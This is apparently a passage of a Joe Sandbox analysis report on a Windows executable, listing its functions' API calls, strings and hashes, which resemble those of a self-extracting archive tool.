                                                                                                              • _free.LIBCMT ref: 00464CE5
                                                                                                              • _free.LIBCMT ref: 00464CEF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$FileModuleName
                                                                                                              • String ID: C:\Users\user\Desktop\file.exe
                                                                                                              • API String ID: 2506810119-1957095476
                                                                                                              • Opcode ID: 4642fe98b725818ef26651168ad1990af7690b0ef9b08a92fb02ab8d621db55c
                                                                                                              • Instruction ID: 40e9ff5157e296bb35c9f74dd628292cdd170ebf04ee2dbed279657323cde7b5
                                                                                                              • Opcode Fuzzy Hash: 4642fe98b725818ef26651168ad1990af7690b0ef9b08a92fb02ab8d621db55c
                                                                                                              • Instruction Fuzzy Hash: AF319E71A01218EFCF21DB9A9D8199EBBF8EBD4710F11406BF80597311E7794A40CB9A
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00447468
                                                                                                                • Part of subcall function 00443AA3: __EH_prolog.LIBCMT ref: 00443AA8
                                                                                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0044752E
                                                                                                                • Part of subcall function 00447A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00447AAC
                                                                                                                • Part of subcall function 00447A9D: GetLastError.KERNEL32 ref: 00447AF2
                                                                                                                • Part of subcall function 00447A9D: CloseHandle.KERNEL32(?), ref: 00447B01
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                              • API String ID: 3813983858-639343689
                                                                                                              • Opcode ID: ada85d73a5b6c6d6f3ed5c036c9909830fad698f562f06e6cca443ebca3a10fb
                                                                                                              • Instruction ID: 9a67cfe6cb35a968353610e6c2a220aa125a559cc7be0d420118b95f087d01a8
                                                                                                              • Opcode Fuzzy Hash: ada85d73a5b6c6d6f3ed5c036c9909830fad698f562f06e6cca443ebca3a10fb
                                                                                                              • Instruction Fuzzy Hash: 2031B571904204AEEF20EF65EC42BEF7B68AF44358F00406FF84DAB252D7785A45C769
                                                                                                              APIs
                                                                                                                • Part of subcall function 004412E7: GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                                • Part of subcall function 004412E7: SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              • EndDialog.USER32(?,00000001), ref: 004591AB
                                                                                                              • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 004591C0
                                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 004591D5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                              • String ID: ASKNEXTVOL
                                                                                                              • API String ID: 445417207-3402441367
                                                                                                              • Opcode ID: e98b4b399c1ec129645d8509164a10c9afda8073a528675d51d55360e8a87093
                                                                                                              • Instruction ID: 63d85d87419923f3dbe5486920fff8b12b1187aa36db36b4cd1b193c3b86b5cd
                                                                                                              • Opcode Fuzzy Hash: e98b4b399c1ec129645d8509164a10c9afda8073a528675d51d55360e8a87093
                                                                                                              • Instruction Fuzzy Hash: 2511E432241A22FFF2019BA49D4DF563B69EB56302F000422FA019B1A2C3699C59D76E
                                                                                                              APIs
                                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,?,00459646,?,?), ref: 0045C022
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DialogParam
                                                                                                              • String ID: *aH$*aH$GETPASSWORD1
                                                                                                              • API String ID: 665744214-2829435320
                                                                                                              • Opcode ID: fb1fde94cd86387cd78feda148d3cacfaf6bd1f713539b340e3377425202e492
                                                                                                              • Instruction ID: c570b8572b996454ca151860c247807b1dd0b6e1785ffad9a8d7f490dee18e7b
                                                                                                              • Opcode Fuzzy Hash: fb1fde94cd86387cd78feda148d3cacfaf6bd1f713539b340e3377425202e492
                                                                                                              • Instruction Fuzzy Hash: 72115932244204AFEB21DE64AC45BAE3784B709752F14807BFD09A72C2D6BC5C84D79C
                                                                                                              APIs
                                                                                                                • Part of subcall function 004412E7: GetDlgItem.USER32(00000000,00003021), ref: 0044132B
                                                                                                                • Part of subcall function 004412E7: SetWindowTextW.USER32(00000000,004702E4), ref: 00441341
                                                                                                              • EndDialog.USER32(?,00000001), ref: 00459694
                                                                                                              • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 004596AC
                                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 004596DA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemText$DialogWindow
                                                                                                              • String ID: GETPASSWORD1
                                                                                                              • API String ID: 445417207-3292211884
                                                                                                              • Opcode ID: b3da1e8ce6743475cb1c47c104277f32e9bfe3bfdee7fb2e4471b5061995599e
                                                                                                              • Instruction ID: d925d8190fc2218c27dd21b8fcac2d71e60d8b67126a4fb9b4cc408790c7f299
                                                                                                              • Opcode Fuzzy Hash: b3da1e8ce6743475cb1c47c104277f32e9bfe3bfdee7fb2e4471b5061995599e
                                                                                                              • Instruction Fuzzy Hash: 54114432900218B7EB219E649D49FFF376CEB49741F000026FE49F2181C2ACAD5C97BA
                                                                                                              APIs
                                                                                                              • _swprintf.LIBCMT ref: 0044B127
                                                                                                                • Part of subcall function 00443F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00443F6E
                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0044B145
                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0044B155
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                              • String ID: %c:\
                                                                                                              • API String ID: 525462905-3142399695
                                                                                                              • Opcode ID: ae943180d3955c53d6e07e48a07076fb0335074dafec33129b07371639a21f26
                                                                                                              • Instruction ID: b9b28513e503b1684955d824d482403a4b97ae1702fb2663f73b628842728b5a
                                                                                                              • Opcode Fuzzy Hash: ae943180d3955c53d6e07e48a07076fb0335074dafec33129b07371639a21f26
                                                                                                              • Instruction Fuzzy Hash: 5901F96350071176E730AB668C81D6BB7ACEF567E0B50441FF884C2182FB28D851C2FA
                                                                                                              APIs
                                                                                                              • InitializeCriticalSection.KERNEL32(000001A0,00481E74,00000000,?,?,0044FB88,00000020,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?), ref: 0044F969
                                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF), ref: 0044F973
                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0044A7C2,?,0044C74B,?,00000000,?,00000001,?,?,?,00453AFF), ref: 0044F983
                                                                                                              Strings
                                                                                                              • Thread pool initialization failed., xrefs: 0044F99B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                              • String ID: Thread pool initialization failed.
                                                                                                              • API String ID: 3340455307-2182114853
                                                                                                              • Opcode ID: ce13d409c091d7341f5f7b173b3b058b46a85b2ec080debb9684cb1b5c98751c
                                                                                                              • Instruction ID: 4ff309f56ade6b99de8c393698e8b104a15116bbc550956c6855b48ef609db24
                                                                                                              • Opcode Fuzzy Hash: ce13d409c091d7341f5f7b173b3b058b46a85b2ec080debb9684cb1b5c98751c
                                                                                                              • Instruction Fuzzy Hash: 761118B2601705AFE3205F769889AA7FBECEB56355F10482FE2DE86200DA7568848B54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                              • API String ID: 0-56093855
                                                                                                              • Opcode ID: dad97f960212788e7e11f35f97e636b89ba9f23f29bb17d2a3f5e2988306beef
                                                                                                              • Instruction ID: a5fd9718a30b7ea236fb34a5dfd0db06c1f446f5644852c8e80c0086008ed0db
                                                                                                              • Opcode Fuzzy Hash: dad97f960212788e7e11f35f97e636b89ba9f23f29bb17d2a3f5e2988306beef
                                                                                                              • Instruction Fuzzy Hash: BA01B172608205AFD7019B28ED40E2ABBE9E749395F00483BFD45D2231D3759C19DFAE
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0044CE57
                                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0044CE66
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindHandleModuleResource
                                                                                                              • String ID: LTR$RTL
                                                                                                              • API String ID: 3537982541-719208805
                                                                                                              • Opcode ID: 2e430622933e82bfae58d28181e51013ac29d2d8594fb06975c802ee0d5024ee
                                                                                                              • Instruction ID: 45361407a252b653c3471b6770ffb45c4f54ec229f01459069697a97b945b1de
                                                                                                              • Opcode Fuzzy Hash: 2e430622933e82bfae58d28181e51013ac29d2d8594fb06975c802ee0d5024ee
                                                                                                              • Instruction Fuzzy Hash: C2F08B31606344A7F77066716C0AFA737ACE781B10F14826FF209C20C0DFA9984987BD
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00447F55,?,?,?), ref: 00449FD0
                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00447F55,?,?), ref: 0044A014
                                                                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00447F55,?,?,?,?,?,?,?,?), ref: 0044A095
                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00447F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0044A09C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 2287278272-0
                                                                                                              • Opcode ID: e3b6243e9a42cc3351efdb99e82c801dbb271dca64234841858a783f991373d9
                                                                                                              • Instruction ID: 122c6e0ed19d851d2ad1f8b4c505158790334bbdbba36e6f6c45c55685402429
                                                                                                              • Opcode Fuzzy Hash: e3b6243e9a42cc3351efdb99e82c801dbb271dca64234841858a783f991373d9
                                                                                                              • Instruction Fuzzy Hash: 4941AC31288381AAF731DF24DC45BAFBBE8AB85704F04091EB5D4D32C1D6789A4C9B5B
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00462794,00000000,00000000,00462FC2,?,00462FC2,?,00000001,00462794,F5E85006,00000001,00462FC2,00462FC2), ref: 00469440
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004694C9
                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004694DB
                                                                                                              • __freea.LIBCMT ref: 004694E4
                                                                                                                • Part of subcall function 004659FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004623AA,?,0000015D,?,?,?,?,00462F29,000000FF,00000000,?,?), ref: 00465A2E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                              • String ID:
                                                                                                              • API String ID: 2652629310-0
                                                                                                              • Opcode ID: 60f4acfb2abbaee83994084ed18aca0f5c8df2ae3c2a430ed95f4ce2dc4e6799
                                                                                                              • Instruction ID: 89b8e9fa57d5de9f744df820c1cc6abe83950ad5c5dbc3b7fd2b9ae7c92fd44b
                                                                                                              • Opcode Fuzzy Hash: 60f4acfb2abbaee83994084ed18aca0f5c8df2ae3c2a430ed95f4ce2dc4e6799
                                                                                                              • Instruction Fuzzy Hash: 9D31D072A0020AABDB258F65DC45EAF7BA9EF40320F14412AFC04D7251EB79CD96CB95
                                                                                                              APIs
                                                                                                              • LoadBitmapW.USER32(00000065), ref: 00459A86
                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00459AA7
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00459ACF
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00459AEE
                                                                                                                • Part of subcall function 00458BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00459AC8,00000066), ref: 00458BE1
                                                                                                                • Part of subcall function 00458BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00459AC8,00000066), ref: 00458BF9
                                                                                                                • Part of subcall function 00458BD0: LoadResource.KERNEL32(00000000,?,?,00459AC8,00000066), ref: 00458C0C
                                                                                                                • Part of subcall function 00458BD0: LockResource.KERNEL32(00000000,?,?,00459AC8,00000066), ref: 00458C17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                              • String ID:
                                                                                                              • API String ID: 142272564-0
                                                                                                              • Opcode ID: 916e18d474f7b1c14fd935c21a6beca8250b93b7669465d89beb9bfbfa6259c5
                                                                                                              • Instruction ID: 20158b18555d1f762ffb6783b3ca599c4927da7b22fae2f2d4d53ed58db05093
                                                                                                              • Opcode Fuzzy Hash: 916e18d474f7b1c14fd935c21a6beca8250b93b7669465d89beb9bfbfa6259c5
                                                                                                              • Instruction Fuzzy Hash: 95012F3264120477C611673A9C42AAFB26EEF84B57F08002AFD04B7293CE698C1982B9
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00461020
                                                                                                                • Part of subcall function 00461658: ___AdjustPointer.LIBCMT ref: 004616A2
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00461037
                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00461049
                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0046106D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                              • String ID:
                                                                                                              • API String ID: 2633735394-0
                                                                                                              • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                              • Instruction ID: a6b1f424048ac027003d6cdeb290596668856400a0f0fd06151345d07563b2c3
                                                                                                              • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                              • Instruction Fuzzy Hash: 00012932000149FBCF225F56CC41EDA3BBAEF58754F09401AFD1866131D33AE8A1EBA5
                                                                                                              APIs
                                                                                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00460B66
                                                                                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00460B6B
                                                                                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00460B70
                                                                                                                • Part of subcall function 00461C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00461C1F
                                                                                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00460B85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                              • String ID:
                                                                                                              • API String ID: 1761009282-0
                                                                                                              • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                              • Instruction ID: c23e527bc22df054d99319e69cb3b8783777295e5a1c8e3c57b91cb6739c41e2
                                                                                                              • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                              • Instruction Fuzzy Hash: C7C04C64144640945C243AF725021AF03400C62BDE78895CFA891171377A0F540A517F
                                                                                                              APIs
                                                                                                                • Part of subcall function 00458BA5: GetDC.USER32(00000000), ref: 00458BA9
                                                                                                                • Part of subcall function 00458BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00458BB4
                                                                                                                • Part of subcall function 00458BA5: ReleaseDC.USER32(00000000,00000000), ref: 00458BBF
                                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00458D24
                                                                                                                • Part of subcall function 00458EEA: GetDC.USER32(00000000), ref: 00458EF3
                                                                                                                • Part of subcall function 00458EEA: GetObjectW.GDI32(?,00000018,?), ref: 00458F22
                                                                                                                • Part of subcall function 00458EEA: ReleaseDC.USER32(00000000,?), ref: 00458FB6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1738022829.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1737952913.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738113479.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000047A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738134875.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1738172487.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_440000_file.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                                              • String ID: (
                                                                                                              • API String ID: 1061551593-3887548279
                                                                                                              • Opcode ID: 9436bd26197230a9cf9d6b93e7d782d74a40e0d5b2bfaae5b1f21a048493d4c3
                                                                                                              • Instruction ID: 47d86d5eca07ecdfbfeda93785c74591593b9c6704257effcfc45adb55b3d23e
                                                                                                              • Opcode Fuzzy Hash: 9436bd26197230a9cf9d6b93e7d782d74a40e0d5b2bfaae5b1f21a048493d4c3
                                                                                                              • Instruction Fuzzy Hash: 9B611371204205AFD210DF64C888E6BBBF9FF88705F10491EF999D7261DB35E84ACB66
